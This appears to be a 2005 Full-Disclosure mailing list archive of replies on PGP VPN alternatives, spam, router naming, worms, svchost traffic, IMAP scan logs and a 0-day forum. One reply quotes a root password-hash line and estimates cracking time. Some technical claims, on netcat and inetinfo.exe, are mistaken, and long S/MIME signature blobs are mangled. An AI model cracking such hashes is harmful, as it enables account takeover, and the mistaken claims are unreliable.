I have a client who was using pgp corporate desktop on win2k for VPN, security and email encryption. ( it has a built in disk encryption, firewall, email encryption and vpn with very good key management ) security was something that happened almost automatically. Now they are planning to move to winxp. Pgpnet does not work on winxp. The latest version pgp desktop does not have pgpnet. They also have LDAP server setup to serve key automatically and the pgp client downloads the keys automatically from the server. What alternatives are there to pgpnet ? Delivered using the Free Personal Edition of Mailtraq (www.mailtraq.com) smime.p7s Description: S/MIME cryptographic signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] multilinks.com security contact ?
One of domains is getting a *very* high number of 419 spams from an address delegated to multilinks.com. Where do I send the spam reports ? I have already send everything to spamcop.net but that has not stopped anything yet Delivered using the Free Personal Edition of Mailtraq (www.mailtraq.com) ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
RE: [Full-disclosure] router naming
Is there a best practice for assign a router name ? e.g.: router type + city + room.id and so on Wich method is usually used to assign a router name ? Think of social engg. Put in some name that would not thing that is not so simple to guess because if someone manages to figure out how they are assigned then it might be game over from the start But a properly secured router would not make a huge difference Delivered using the Free Personal Edition of Mailtraq (www.mailtraq.com) ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
RE: [Full-disclosure] RE: Example firewall script (iptables)
-Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Bernardo Martín Sent: Tuesday, August 30, 2005 1:11 PM To: Full Disclosure Subject: RE: [Full-disclosure] RE: Example firewall script (iptables) In my first email i requested about bad example firewall script, in later mail i said that this script was to learn more so the scene isn't important because i'm loking for bad script in any scene If you are going to learn go to the Linux documentation project Website. There is a how-to Linux-firewalls that is a pretty good document Also there are some other documents breaking out of firewall Read those also and you should have enough basics about firewall Delivered using the Free Personal Edition of Mailtraq (www.mailtraq.com) ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
RE: [Full-disclosure] beginning to count the time
root:OM0PNa4I9RlNk:0:3:gecos:/home/root:/sbin/sh
If you have this level of access why don't you just change
The password ?
To obtain this password if it was easy one it should take
2 days at the most or you will be looking for a 2 month
hammering on the password without knowing for sure that
it might be recovered
begin 666 smime.p7s
M,( 2J2(;W#0$'`J ,( `0$QS )[EMAIL PROTECTED]@,@4`,( 2J2(;W#0$'
M`0``H(()?3`P4P@@)NH ,`0(`P]$# [EMAIL PROTECTED]]PT!`00%`#!B,0LP
M08#500$P):03$E,,`U4$A,5AA=W1E($-O;G-U;'1I;F@*%!T2D@
M3'1D+C$L,H`U4$`Q,C5AA=W1E(%!EG-O;F%L($9R965M86EL($ESW5I
M;F@0T$P'A-,#4P.# X,#0T.#0V6A-,#8P.# X,#0T.#0V6C!,1\P'08#
M500#$Q94:%W=[EMAIL PROTECTED])E96UA:[EMAIL PROTECTED],3LP.08)*H9(AO-`0D!%BQA
M9ET6$N95S:UU:VA ;VYL:6YE+F=A=5W87DNW1R86YG;5D+FYE=#
M`2(P#08)*H9(AO-`0$!!0`#@@$/`#`0H@@$!`*V[W[(L0FU!P+1;W$3
M#Y[VQE1?27[6O))6O0TQLW.T@MP_U8N/P@'?3-Q4J_GR0P_=0B-%7T%]
M/_*118FWGJTQ2Y6+T6.JZ-V1#@1$E^;LBB1=GQ*5H)6W.? .[:C?!3
M,\[EMAIL PROTECTED],1J*ZPO1$$IU5'0C]8::RUXQP#UTTOXC,;U
M0.[%) ]V#K2#6V^($TRLCR(7T7ZR\$U?4)$;$. Z581SU5-$4^5S8K*5
MP6 (2;QCS9)QQIY^9FI5T=H6^($95*Z[EMAIL PROTECTED]
M9,MC2J,`9T3)^PF*1LSDJL`P$``:-),$P-P8#51T1!# P+H$L861I='EA
M+F1EVAM=6MH0]N;EN92YG871E=V%Y+G-TF%N9VQE9YN970P# 8#51T3
M`0'_! (P`# [EMAIL PROTECTED][EMAIL PROTECTED]BDKT.@ H76F=3A 6U35ML_P[
MA^I;Y'@AY.EP[2_W9XX=QE@]*K%%\A5(YA;R6?WZX2A]ZU%K,%
MBXMM!V2R'^.5P!5 A+RK^$(G9?,MQBX5#NX_6)BHH))CUL(%+XMI$G
MK]YHF?3R3ET,*64XME+=L%H'.#`RTP@@*6H ,`0(`0`P#08)*H9(AO-
[EMAIL PROTECTED]S )[EMAIL PROTECTED] 83`EI!,14P$P8#500($PQ797-T97)N($-A4Q
M$C [EMAIL PROTECTED] 34-A[EMAIL
PROTECTED]]W;C$:,!@`U4$A,15AA=W1E($-O;G-U;'1I
M;FQ*# [EMAIL PROTECTED] L3'T-EG1I9FEC871I;[EMAIL PROTECTED],@1EV:7-I;VXQ
M)# [EMAIL PROTECTED] ,3U1H87=T92!097)S;VYA;!F5E;6%I;!#03$K,D2J
M2(;W#0$)`185RV]N86PM9G)E96UA:6Q =AA=W1E+F-O;3 %PTY-C Q
M,#$P,# P,#!:%PTR,#$R,S$R,S4Y-3E:,('1,0LP08#500$P):03$5,!,
M`U4$!,,5V5S=5R;B!#87!E,1(P$ 8#500'$PE#87!E(%1O=VXQC [EMAIL PROTECTED]
M! H3$51H87=T92!#;VYS=6QT:6YG,[EMAIL PROTECTED])@8#500+$Q]#97)T:69I8V%T:6]N
M(%-EG9I8V5S($1I=FES:6]N,20P(@8#500#$QM4:%W=[EMAIL PROTECTED]5RV]N86P@
M1G)E96UA:[EMAIL PROTECTED] [EMAIL PROTECTED]]PT!0$6''!EG-O;F%L+69R965M86EL
M0'1H87=T92YC;[EMAIL PROTECTED])*H9(AO[EMAIL PROTECTED],()`H!`-1IU]2P
ME1;E'V Q1MNIRD;$7GTM#8][$M^%)74H=#I+,GGY5[2^]^8=ANJC
MW;G.EF0:PA1N1*Q\YH_H30]Q'T XI@CAWCV^927JWJP%YVZ]D4HUUNGP,
MI4M5?P89*7^FB;5:KLX) AJF,QVJ.8D?UYV^5:Q!RY`@,!``C$S 1, \
M`U4=$P$!_P0%, ,!`?\P#08)*H9(AO[EMAIL PROTECTED]:E9V(J
MI/!-$6#0;[EMAIL PROTECTED]L)KM2-5P(SS#[J$J6BA]B0B.,%P_TNF2%ZQ'*=^=F%[2
M;!Q7**LW'GCYVX`1Q^U#2CH`IWDFOT3]*;9?+'XW%\C)@F1@'/0%!O0ZF#
M)?+FG\5ROZFJXH'=8L,W5$:^3XTYWHH$P@@,_,((J* [EMAIL PROTECTED][EMAIL
PROTECTED], T
M2J2(;W#0$!!04`,('1,0LP08#500$P):03$5,!,`U4$!,,5V5S=5R
M;B!#87!E,1(P$ 8#500'$PE#87!E(%1O=VXQC [EMAIL PROTECTED] H3$51H87=T92!#
M;VYS=6QT:6YG,[EMAIL PROTECTED])@8#500+$Q]#97)T:69I8V%T:6]N(%-EG9I8V5S($1I
M=FES:6]N,20P(@8#500#$QM4:%W=[EMAIL PROTECTED]5R[EMAIL
PROTECTED])E96UA:[EMAIL PROTECTED]
M*S [EMAIL PROTECTED]]PT!0$6''!EG-O;F%L+69R965M86EL0'1H87=T92YC;VTP
M'A-,#,P-S$W,# P,# P6A-,3,P-S$V,C,U.34Y6C!B,0LP08#500$P):
M03$E,,`U4$A,5AA=W1E($-O;G-U;'1I;F@*%!T[EMAIL PROTECTED]'1D+C$L,H
M`U4$`Q,C5AA=W1E(%!EG-O;F%L($9R965M86EL($ESW5I;F@[EMAIL PROTECTED]
M#08)*H9(AO[EMAIL PROTECTED],()`H!`,2F/%5S5?M.NJ96AYHP'4$)W?
MZ?^C'NR]S?5;\AIVO7\,.F'ROU'.`=3E4 HPUP)C6BR)%7.WGP*X5:JC]Q
M5LNO/ L'Y_$?D38D*A//[EMAIL PROTECTED]]`[XK_KL8/@_0( 9-GIKN?9='%*E2%
[EMAIL PROTECTED]VT3QA!$ 9!ER8+?[`@,!``[EMAIL PROTECTED]@[EMAIL
PROTECTED]'_! @[EMAIL PROTECTED]
M_P([EMAIL PROTECTED]'1\$/# Z,[EMAIL PROTECTED]
TAC)H='1P.B\O8W)L+G1H87=T92YC;VTO
M5AA=W1E45RV]N86QF5E;6%I;$-!+F-R;# [EMAIL PROTECTED]'0\$! ,`08P*08#
M51T1!(P(*0,!PQC [EMAIL PROTECTED] ,3$5!R:79A=5,86)E;#(M,3,X, T2J
M2(;W#0$!!04``X!`$B,T5[EMAIL PROTECTED] VC9JQG#W^OK+[%Z%#EI2=?TPAN/@V
M'ZHMGS8OP/043#S]K%A8L/9.AE^A+9P#%@N=)XE4)1BQ]LG5E
MC=VIG#F.C!/95^5VO?WA];$ZN]NHTY1 :6S5-=^-6(7BW$9-=XDL=,=
M1O]=7V5/,8(#MS`[,`0$P:3!B,0LP08#500$P):03$E,,`U4$A,
M5AA=W1E($-O;G-U;'1I;F@*%!T[EMAIL PROTECTED]'1D+C$L,H`U4$`Q,C5AA=W1E
M(%!EG-O;F%L($9R965M86EL($ESW5I;F@0T$`P]$# )[EMAIL PROTECTED]@,@4`
MH(((S [EMAIL PROTECTED]]PT!0,QP8)*H9(AO-`0!,!P2J2(;W#0$)!3$/
M%PTP-3 X,C0Q.3,S,3):,,2J2(;W#0$)!#$6!!3C3AG3)V0`6U:80M+
M7[EMAIL PROTECTED]@LJADB]PT!1 `3%6,%0$'0`0E5Y:FXX6$*#
M0@/*(,-XP$`@ $`,# P+H$L861I='EA+F1EVAM=6MH0]N;EN92YG
M871E=V%Y+G-TF%N9VQE9YN970P9P8)*H9(AO-`0D/,5HP6# *!@@JADB
M]PT#!S .!@@JADB]PT#`@(`( P#08(*H9(AO-`P(`4 P!P8%*PX#`@P
M#08(*H9(AO-`P([EMAIL PROTECTED]@8(*H9(AO[EMAIL PROTECTED] 8)*P8!!
M-Q $,6LP:3!B,0LP08#500$P):03$E,,`U4$A,5AA=W1E($-O;G-U
M;'1I;F@*%!T[EMAIL PROTECTED]'1D+C$L,H`U4$`Q,C5AA=W1E(%!EG-O;F%L($9R
M965M86EL($ESW5I;F@0T$`P]$[EMAIL PROTECTED]]PT!1 S%KHDP8C$+
M, D`U4$!A,6D$Q)3 [EMAIL PROTECTED] H3'%1H87=T92!#;VYS=6QT:6YG(A0='DI
M($QT9XQ+# [EMAIL PROTECTED] ,3(U1H87=T92!097)S;VYA;!F5E;6%I;!)W-U
M:6YG($-!`@,/1 @P#08)*H9(AO-`0$!!0`$@@$`?(@RIE([EMAIL PROTECTED] -#*2I
M!/O$6!QJ_-F[0I._;?_JQ',;(51AJE'%/@PH8N9!@1L38\V2,4'RY/#DF
RE: [Full-disclosure] anybody remember the name of this tool
I forget the name of a tool that can be used to intercept TCP packet and allow you to modify the packet before it was sent out. Netcat ? Delivered using the Free Personal Edition of Mailtraq (www.mailtraq.com) ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
RE: [Full-disclosure] talk.google.com
Personally, I'm very afraid of the power that Google is gaining . I mean, most searches are done through google, so they know what you're interested in, then a lot of peoples email's going through them, with gmail, now italk . next is world domination? Why do you have to use gmail when it is very easy to setup a mail server On your own personal computer and also setup a jabber server if required Its your choice what you want to use Delivered using the Free Personal Edition of Mailtraq (www.mailtraq.com) ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
RE: [Full-disclosure] An old/new security list
thinking security-minded people always backed up their hdds daily :D Backups are for hobos - we prefer rsync over ssh :) Delivered using the Free Personal Edition of Mailtraq (www.mailtraq.com) ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
RE: [Full-disclosure] Zotob Worm Remover
I myself have an agent with a few basic O/S rules like : - No application may write other applications memory space - No application may inject code into other programs (dll hooks and such) - No application may access system functions from code executing in data or stack space - No application may capture keystrokes This does quite abit to protect my laptop from unknown attacks What agent is this ? I would like to try this out on my vmware Can you please tell me more about this ? This would be good ... Delivered using the Free Personal Edition of Mailtraq (www.mailtraq.com) ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
RE: [Full-disclosure] windows netstat
netstat gives me the following results inetinfo.exe LISTENING on port 80 if I am not mistaken this is the internet father process present in all the windows systems Delivered using the Free Personal Edition of Mailtraq (www.mailtraq.com) ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
RE: [Full-disclosure] Re: pnp worm unknown variant - post infectionactions
Very good points, but can you think of another worm that downloaded XXX spyware/adware ? I can't give you a specific name -- when I first saw it it didn't strike me as any more significant than the warez and porn FTP servers I'd seen years earlier, so didn't make specific note of it -- but there have been many. We see new bots every day (many dozen a week) that are issued orders on joining the CC network to install all manner of adware, spyware, click-for-dosh agents and so on. Among those there will be many things dealing in XXX content but often analysis doesn't even go so far as checking that the target URL is still reachable... From : http://netrn.net/spywareblog/archives/2005/01/03/more-on-adware-installed-th ough-windows-media-files/ I installed the same WMA file on an old Win ME box with no protection except AVG free and the free version of Zone Alarm. I ended up with 11 desktop shortcuts for everything from Get This Weeks Deals from Dell to Get Sex Toys Direct, Hot Facial xxx Shots, and so on. From: http://forums.spywareinfo.com/lofiversion/index.php/t30275.html she said, It may be associated with an unwanted autostarting Internet Explorer trying to install a Hot-SeXXX toolbar. Adaware has a list of spyware which shows a lot of them display XXX popups - maybe some them just started showing something what you wanted in your senario If you want any specific names I would dig further - just mail me off list Delivered using the Free Personal Edition of Mailtraq (www.mailtraq.com) ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
RE: [Full-disclosure] svchost.exe try to send http outside
Very hard to say without having a sample or knowing what service your server performs. svchost.exe is a valid Windows process and also commonly used by/with many many malware. Care to send a sample ? Delivered using the Free Personal Edition of Mailtraq (www.mailtraq.com) ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
RE: [Full-disclosure] [Fwd: Re: Global CompuSearch]
Paul Schmehl wrote: Is there a compelling reason for posting this pissing contest to the list? Yes, there is, Paul. But you weren't paying attention, as usual. I have created a mailing list to discuss this case of injustice List address [EMAIL PROTECTED] or [EMAIL PROTECTED] Subscribe address [EMAIL PROTECTED] or [EMAIL PROTECTED] And the all important unsubscribe address [EMAIL PROTECTED] or [EMAIL PROTECTED] List rules - to post you have to subscribe And all post to be in plain text. Delivered using the Free Personal Edition of Mailtraq (www.mailtraq.com) ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
RE: [Full-disclosure] IMAP scans? Something going on I should knowabout?
My personal logs for imap scan for last 3 days -
11/08/2005 10:47:29 IMAP: (Accept) Receiving from 218.47.179.77
11/08/2005 10:48:00 IMAP: (Accept) Receiving from 218.47.179.77
12/08/2005 10:31:06 IMAP: (Accept) Receiving from 220.224.38.222
12/08/2005 14:00:34 IMAP: (Accept) Receiving from 61.155.62.178
12/08/2005 14:00:35 IMAP: (Accept) Receiving from 61.155.62.178
12/08/2005 14:08:57 IMAP: (Accept) Receiving from 61.155.62.178
12/08/2005 14:08:58 IMAP: (Accept) Receiving from 61.155.62.178
12/08/2005 19:11:59 IMAP: (Accept) Receiving from 220.224.1.25
13/08/2005 07:17:36 IMAP: (Accept) Receiving from 220.224.3.145
13/08/2005 12:09:46 IMAP: (Accept) Receiving from 220.224.48.17
13/08/2005 13:37:34 IMAP: (Accept) Receiving from 61.155.62.178
13/08/2005 13:37:36 IMAP: (Accept) Receiving from 61.155.62.178
13/08/2005 13:49:08 IMAP: (Accept) Receiving from 220.224.0.106
13/08/2005 17:03:32 IMAP: (Accept) Receiving from 220.224.0.214
13/08/2005 17:03:35 IMAP: (Accept) Receiving from 220.224.0.214
13/08/2005 18:44:57 IMAP: (Accept) Receiving from 220.224.36.248
13/08/2005 18:45:00 IMAP: (Accept) Receiving from 220.224.36.248
13/08/2005 22:23:22 IMAP: (Accept) Receiving from 220.224.21.178
13/08/2005 22:53:11 IMAP: (Accept) Receiving from 220.224.0.173
13/08/2005 22:53:14 IMAP: (Accept) Receiving from 220.224.0.173
14/08/2005 01:38:45 IMAP: (Accept) Receiving from 220.224.17.140
14/08/2005 01:38:47 IMAP: (Accept) Receiving from 220.224.17.140
14/08/2005 11:39:52 IMAP: (Accept) Receiving from 61.155.62.178
14/08/2005 11:39:53 IMAP: (Accept) Receiving from 61.155.62.178
14/08/2005 11:45:31 IMAP: (Accept) Receiving from 58.1.64.17
14/08/2005 11:45:33 IMAP: (Accept) Receiving from 58.1.64.17
14/08/2005 13:07:19 IMAP: (Accept) Receiving from 220.224.2.50
14/08/2005 13:07:29 IMAP: (Accept) Receiving from 220.224.2.50
14/08/2005 15:08:35 IMAP: (Accept) Receiving from 220.224.41.75
14/08/2005 16:40:42 IMAP: (Accept) Receiving from 220.175.143.169
14/08/2005 16:40:44 IMAP: (Accept) Receiving from 220.175.143.169
14/08/2005 16:42:02 IMAP: (Accept) Receiving from 220.224.11.220
14/08/2005 16:42:10 IMAP: (Accept) Receiving from 220.224.11.220
14/08/2005 17:19:17 IMAP: (Accept) Receiving from 220.224.42.213
14/08/2005 21:58:15 IMAP: (Accept) Receiving from 219.65.238.37
14/08/2005 21:58:18 IMAP: (Accept) Receiving from 219.65.238.37
Anything going on out there that I've missed? Thanks!
I would like to know is there some imap exploit floating about ?
I am trying to get a packet dump I will post as soon as I get one.
I have set the next alert to be logged with the packet dump
Can anyone else also get a packet dump for correlation ?
- Aditya
begin 666 smime.p7s
M,( 2J2(;W#0$'`J ,( `0$QS )[EMAIL PROTECTED]@,@4`,( 2J2(;W#0$'
M`0``H(()?3`P4P@@)NH ,`0(`P]$# [EMAIL PROTECTED]]PT!`00%`#!B,0LP
M08#500$P):03$E,,`U4$A,5AA=W1E($-O;G-U;'1I;F@*%!T2D@
M3'1D+C$L,H`U4$`Q,C5AA=W1E(%!EG-O;F%L($9R965M86EL($ESW5I
M;F@0T$P'A-,#4P.# X,#0T.#0V6A-,#8P.# X,#0T.#0V6C!,1\P'08#
M500#$Q94:%W=[EMAIL PROTECTED])E96UA:[EMAIL PROTECTED],3LP.08)*H9(AO-`0D!%BQA
M9ET6$N95S:UU:VA ;VYL:6YE+F=A=5W87DNW1R86YG;5D+FYE=#
M`2(P#08)*H9(AO-`0$!!0`#@@$/`#`0H@@$!`*V[W[(L0FU!P+1;W$3
M#Y[VQE1?27[6O))6O0TQLW.T@MP_U8N/P@'?3-Q4J_GR0P_=0B-%7T%]
M/_*118FWGJTQ2Y6+T6.JZ-V1#@1$E^;LBB1=GQ*5H)6W.? .[:C?!3
M,\[EMAIL PROTECTED],1J*ZPO1$$IU5'0C]8::RUXQP#UTTOXC,;U
M0.[%) ]V#K2#6V^($TRLCR(7T7ZR\$U?4)$;$. Z581SU5-$4^5S8K*5
MP6 (2;QCS9)QQIY^9FI5T=H6^($95*Z[EMAIL PROTECTED]
M9,MC2J,`9T3)^PF*1LSDJL`P$``:-),$P-P8#51T1!# P+H$L861I='EA
M+F1EVAM=6MH0]N;EN92YG871E=V%Y+G-TF%N9VQE9YN970P# 8#51T3
M`0'_! (P`# [EMAIL PROTECTED][EMAIL PROTECTED]BDKT.@ H76F=3A 6U35ML_P[
MA^I;Y'@AY.EP[2_W9XX=QE@]*K%%\A5(YA;R6?WZX2A]ZU%K,%
MBXMM!V2R'^.5P!5 A+RK^$(G9?,MQBX5#NX_6)BHH))CUL(%+XMI$G
MK]YHF?3R3ET,*64XME+=L%H'.#`RTP@@*6H ,`0(`0`P#08)*H9(AO-
[EMAIL PROTECTED]S )[EMAIL PROTECTED] 83`EI!,14P$P8#500($PQ797-T97)N($-A4Q
M$C [EMAIL PROTECTED] 34-A[EMAIL
PROTECTED]]W;C$:,!@`U4$A,15AA=W1E($-O;G-U;'1I
M;FQ*# [EMAIL PROTECTED] L3'T-EG1I9FEC871I;[EMAIL PROTECTED],@1EV:7-I;VXQ
M)# [EMAIL PROTECTED] ,3U1H87=T92!097)S;VYA;!F5E;6%I;!#03$K,D2J
M2(;W#0$)`185RV]N86PM9G)E96UA:6Q =AA=W1E+F-O;3 %PTY-C Q
M,#$P,# P,#!:%PTR,#$R,S$R,S4Y-3E:,('1,0LP08#500$P):03$5,!,
M`U4$!,,5V5S=5R;B!#87!E,1(P$ 8#500'$PE#87!E(%1O=VXQC [EMAIL PROTECTED]
M! H3$51H87=T92!#;VYS=6QT:6YG,[EMAIL PROTECTED])@8#500+$Q]#97)T:69I8V%T:6]N
M(%-EG9I8V5S($1I=FES:6]N,20P(@8#500#$QM4:%W=[EMAIL PROTECTED]5RV]N86P@
M1G)E96UA:[EMAIL PROTECTED] [EMAIL PROTECTED]]PT!0$6''!EG-O;F%L+69R965M86EL
M0'1H87=T92YC;[EMAIL PROTECTED])*H9(AO[EMAIL PROTECTED],()`H!`-1IU]2P
ME1;E'V Q1MNIRD;$7GTM#8][$M^%)74H=#I+,GGY5[2^]^8=ANJC
MW;G.EF0:PA1N1*Q\YH_H30]Q'T XI@CAWCV^927JWJP%YVZ]D4HUUNGP,
MI4M5?P89*7^FB;5:KLX) AJF,QVJ.8D?UYV^5:Q!RY`@,!``C$S 1, \
M`U4=$P$!_P0%, ,!`?\P#08)*H9(AO[EMAIL PROTECTED]:E9V(J
MI/!-$6#0;[EMAIL PROTECTED]L)KM2-5P(SS#[J$J6BA]B0B.,%P_TNF2%ZQ'*=^=F%[2
M;!Q7**LW'GCYVX`1Q^U#2CH`IWDFOT3]*;9?+'XW%\C)@F1@'/0%!O0ZF#
M)?+FG\5ROZFJXH'=8L,W5$:^3XTYWHH$P@@,_,((J* [EMAIL
RE: [Full-disclosure] The best 0-day exploit source
[EMAIL PROTECTED]:~$
who runs the site?
I want access
You need to hack into it, obviously.
Wont have to hack just type your password and you are inside - now was that
difficult... ?
begin 666 smime.p7s
M,( 2J2(;W#0$'`J ,( `0$QS )[EMAIL PROTECTED]@,@4`,( 2J2(;W#0$'
M`0``H(()?3`P4P@@)NH ,`0(`P]$# [EMAIL PROTECTED]]PT!`00%`#!B,0LP
M08#500$P):03$E,,`U4$A,5AA=W1E($-O;G-U;'1I;F@*%!T2D@
M3'1D+C$L,H`U4$`Q,C5AA=W1E(%!EG-O;F%L($9R965M86EL($ESW5I
M;F@0T$P'A-,#4P.# X,#0T.#0V6A-,#8P.# X,#0T.#0V6C!,1\P'08#
M500#$Q94:%W=[EMAIL PROTECTED])E96UA:[EMAIL PROTECTED],3LP.08)*H9(AO-`0D!%BQA
M9ET6$N95S:UU:VA ;VYL:6YE+F=A=5W87DNW1R86YG;5D+FYE=#
M`2(P#08)*H9(AO-`0$!!0`#@@$/`#`0H@@$!`*V[W[(L0FU!P+1;W$3
M#Y[VQE1?27[6O))6O0TQLW.T@MP_U8N/P@'?3-Q4J_GR0P_=0B-%7T%]
M/_*118FWGJTQ2Y6+T6.JZ-V1#@1$E^;LBB1=GQ*5H)6W.? .[:C?!3
M,\[EMAIL PROTECTED],1J*ZPO1$$IU5'0C]8::RUXQP#UTTOXC,;U
M0.[%) ]V#K2#6V^($TRLCR(7T7ZR\$U?4)$;$. Z581SU5-$4^5S8K*5
MP6 (2;QCS9)QQIY^9FI5T=H6^($95*Z[EMAIL PROTECTED]
M9,MC2J,`9T3)^PF*1LSDJL`P$``:-),$P-P8#51T1!# P+H$L861I='EA
M+F1EVAM=6MH0]N;EN92YG871E=V%Y+G-TF%N9VQE9YN970P# 8#51T3
M`0'_! (P`# [EMAIL PROTECTED][EMAIL PROTECTED]BDKT.@ H76F=3A 6U35ML_P[
MA^I;Y'@AY.EP[2_W9XX=QE@]*K%%\A5(YA;R6?WZX2A]ZU%K,%
MBXMM!V2R'^.5P!5 A+RK^$(G9?,MQBX5#NX_6)BHH))CUL(%+XMI$G
MK]YHF?3R3ET,*64XME+=L%H'.#`RTP@@*6H ,`0(`0`P#08)*H9(AO-
[EMAIL PROTECTED]S )[EMAIL PROTECTED] 83`EI!,14P$P8#500($PQ797-T97)N($-A4Q
M$C [EMAIL PROTECTED] 34-A[EMAIL
PROTECTED]]W;C$:,!@`U4$A,15AA=W1E($-O;G-U;'1I
M;FQ*# [EMAIL PROTECTED] L3'T-EG1I9FEC871I;[EMAIL PROTECTED],@1EV:7-I;VXQ
M)# [EMAIL PROTECTED] ,3U1H87=T92!097)S;VYA;!F5E;6%I;!#03$K,D2J
M2(;W#0$)`185RV]N86PM9G)E96UA:6Q =AA=W1E+F-O;3 %PTY-C Q
M,#$P,# P,#!:%PTR,#$R,S$R,S4Y-3E:,('1,0LP08#500$P):03$5,!,
M`U4$!,,5V5S=5R;B!#87!E,1(P$ 8#500'$PE#87!E(%1O=VXQC [EMAIL PROTECTED]
M! H3$51H87=T92!#;VYS=6QT:6YG,[EMAIL PROTECTED])@8#500+$Q]#97)T:69I8V%T:6]N
M(%-EG9I8V5S($1I=FES:6]N,20P(@8#500#$QM4:%W=[EMAIL PROTECTED]5RV]N86P@
M1G)E96UA:[EMAIL PROTECTED] [EMAIL PROTECTED]]PT!0$6''!EG-O;F%L+69R965M86EL
M0'1H87=T92YC;[EMAIL PROTECTED])*H9(AO[EMAIL PROTECTED],()`H!`-1IU]2P
ME1;E'V Q1MNIRD;$7GTM#8][$M^%)74H=#I+,GGY5[2^]^8=ANJC
MW;G.EF0:PA1N1*Q\YH_H30]Q'T XI@CAWCV^927JWJP%YVZ]D4HUUNGP,
MI4M5?P89*7^FB;5:KLX) AJF,QVJ.8D?UYV^5:Q!RY`@,!``C$S 1, \
M`U4=$P$!_P0%, ,!`?\P#08)*H9(AO[EMAIL PROTECTED]:E9V(J
MI/!-$6#0;[EMAIL PROTECTED]L)KM2-5P(SS#[J$J6BA]B0B.,%P_TNF2%ZQ'*=^=F%[2
M;!Q7**LW'GCYVX`1Q^U#2CH`IWDFOT3]*;9?+'XW%\C)@F1@'/0%!O0ZF#
M)?+FG\5ROZFJXH'=8L,W5$:^3XTYWHH$P@@,_,((J* [EMAIL PROTECTED][EMAIL
PROTECTED], T
M2J2(;W#0$!!04`,('1,0LP08#500$P):03$5,!,`U4$!,,5V5S=5R
M;B!#87!E,1(P$ 8#500'$PE#87!E(%1O=VXQC [EMAIL PROTECTED] H3$51H87=T92!#
M;VYS=6QT:6YG,[EMAIL PROTECTED])@8#500+$Q]#97)T:69I8V%T:6]N(%-EG9I8V5S($1I
M=FES:6]N,20P(@8#500#$QM4:%W=[EMAIL PROTECTED]5R[EMAIL
PROTECTED])E96UA:[EMAIL PROTECTED]
M*S [EMAIL PROTECTED]]PT!0$6''!EG-O;F%L+69R965M86EL0'1H87=T92YC;VTP
M'A-,#,P-S$W,# P,# P6A-,3,P-S$V,C,U.34Y6C!B,0LP08#500$P):
M03$E,,`U4$A,5AA=W1E($-O;G-U;'1I;F@*%!T[EMAIL PROTECTED]'1D+C$L,H
M`U4$`Q,C5AA=W1E(%!EG-O;F%L($9R965M86EL($ESW5I;F@[EMAIL PROTECTED]
M#08)*H9(AO[EMAIL PROTECTED],()`H!`,2F/%5S5?M.NJ96AYHP'4$)W?
MZ?^C'NR]S?5;\AIVO7\,.F'ROU'.`=3E4 HPUP)C6BR)%7.WGP*X5:JC]Q
M5LNO/ L'Y_$?D38D*A//[EMAIL PROTECTED]]`[XK_KL8/@_0( 9-GIKN?9='%*E2%
[EMAIL PROTECTED]VT3QA!$ 9!ER8+?[`@,!``[EMAIL PROTECTED]@[EMAIL
PROTECTED]'_! @[EMAIL PROTECTED]
M_P([EMAIL PROTECTED]'1\$/# Z,[EMAIL PROTECTED]
TAC)H='1P.B\O8W)L+G1H87=T92YC;VTO
M5AA=W1E45RV]N86QF5E;6%I;$-!+F-R;# [EMAIL PROTECTED]'0\$! ,`08P*08#
M51T1!(P(*0,!PQC [EMAIL PROTECTED] ,3$5!R:79A=5,86)E;#(M,3,X, T2J
M2(;W#0$!!04``X!`$B,T5[EMAIL PROTECTED] VC9JQG#W^OK+[%Z%#EI2=?TPAN/@V
M'ZHMGS8OP/043#S]K%A8L/9.AE^A+9P#%@N=)XE4)1BQ]LG5E
MC=VIG#F.C!/95^5VO?WA];$ZN]NHTY1 :6S5-=^-6(7BW$9-=XDL=,=
M1O]=7V5/,8(#MS`[,`0$P:3!B,0LP08#500$P):03$E,,`U4$A,
M5AA=W1E($-O;G-U;'1I;F@*%!T[EMAIL PROTECTED]'1D+C$L,H`U4$`Q,C5AA=W1E
M(%!EG-O;F%L($9R965M86EL($ESW5I;F@0T$`P]$# )[EMAIL PROTECTED]@,@4`
MH(((S [EMAIL PROTECTED]]PT!0,QP8)*H9(AO-`0!,!P2J2(;W#0$)!3$/
M%PTP-3 X,3$Q-C,Q,S1:,,2J2(;W#0$)!#$6!!2RUXRK/^#,H(`-R%A
MS7#*62:[EMAIL PROTECTED]]PT!1 `3%6,%0$'0`0:T)C*DR+AD*0
M+PGHD(*4TP$`@ $`,# P+H$L861I='EA+F1EVAM=6MH0]N;EN92YG
M871E=V%Y+G-TF%N9VQE9YN970P9P8)*H9(AO-`0D/,5HP6# *!@@JADB
M]PT#!S .!@@JADB]PT#`@(`( P#08(*H9(AO-`P(`4 P!P8%*PX#`@P
M#08(*H9(AO-`P([EMAIL PROTECTED]@8(*H9(AO[EMAIL PROTECTED] 8)*P8!!
